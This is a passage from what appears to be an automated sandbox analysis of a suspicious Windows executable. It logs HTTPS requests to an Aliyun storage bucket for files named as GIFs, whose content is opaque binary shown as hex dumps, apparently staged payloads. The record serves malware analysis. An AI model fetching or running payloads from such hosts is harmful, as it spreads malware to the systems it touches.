                                            2025-01-09 03:28:34 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                            2025-01-09 03:28:34 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                            Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                            2025-01-09 03:28:34 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                            Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                            2025-01-09 03:28:34 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                            Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                            2025-01-09 03:28:34 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                            Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                            2025-01-09 03:28:34 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                            Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                            2025-01-09 03:28:34 UTC4096INData Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2
                                            Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                            2025-01-09 03:28:34 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                            Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                            2025-01-09 03:28:34 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                            Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                            2025-01-09 03:28:34 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                            Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.74968459.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:36 UTC111OUTGET /c.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:36 UTC546INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:36 GMT
                                            Content-Type: image/gif
                                            Content-Length: 10681
                                            Connection: close
                                            x-oss-request-id: 677F42641253C530358B113C
                                            Accept-Ranges: bytes
                                            ETag: "10A818386411EE834D99AE6B7B68BE71"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:15 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 10287299869673359293
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                            x-oss-server-time: 22
                                            2025-01-09 03:28:36 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                            2025-01-09 03:28:36 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                            Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                            2025-01-09 03:28:36 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                            Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.74968559.110.190.444434476C:\Users\user\Desktop\2362476847-83854387.07.exe
                                            TimestampBytes transferredDirectionData
                                            2025-01-09 03:28:37 UTC111OUTGET /d.gif HTTP/1.1
                                            User-Agent: GetData
                                            Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                            Cache-Control: no-cache
                                            2025-01-09 03:28:38 UTC547INHTTP/1.1 200 OK
                                            Server: AliyunOSS
                                            Date: Thu, 09 Jan 2025 03:28:38 GMT
                                            Content-Type: image/gif
                                            Content-Length: 3892010
                                            Connection: close
                                            x-oss-request-id: 677F42655DFDD1373116FAC5
                                            Accept-Ranges: bytes
                                            ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                            Last-Modified: Wed, 08 Jan 2025 11:04:19 GMT
                                            x-oss-object-type: Normal
                                            x-oss-hash-crc64ecma: 3363616613234190325
                                            x-oss-storage-class: Standard
                                            x-oss-ec: 0048-00000104
                                            Content-Disposition: attachment
                                            x-oss-force-download: true
                                            Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                            x-oss-server-time: 44
                                            2025-01-09 03:28:38 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                            2025-01-09 03:28:38 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                            Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                            2025-01-09 03:28:38 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                            Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                            2025-01-09 03:28:38 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                            Data Ascii: -J;wuwu{}uG`uWu{Q6
                                            2025-01-09 03:28:38 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                            Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
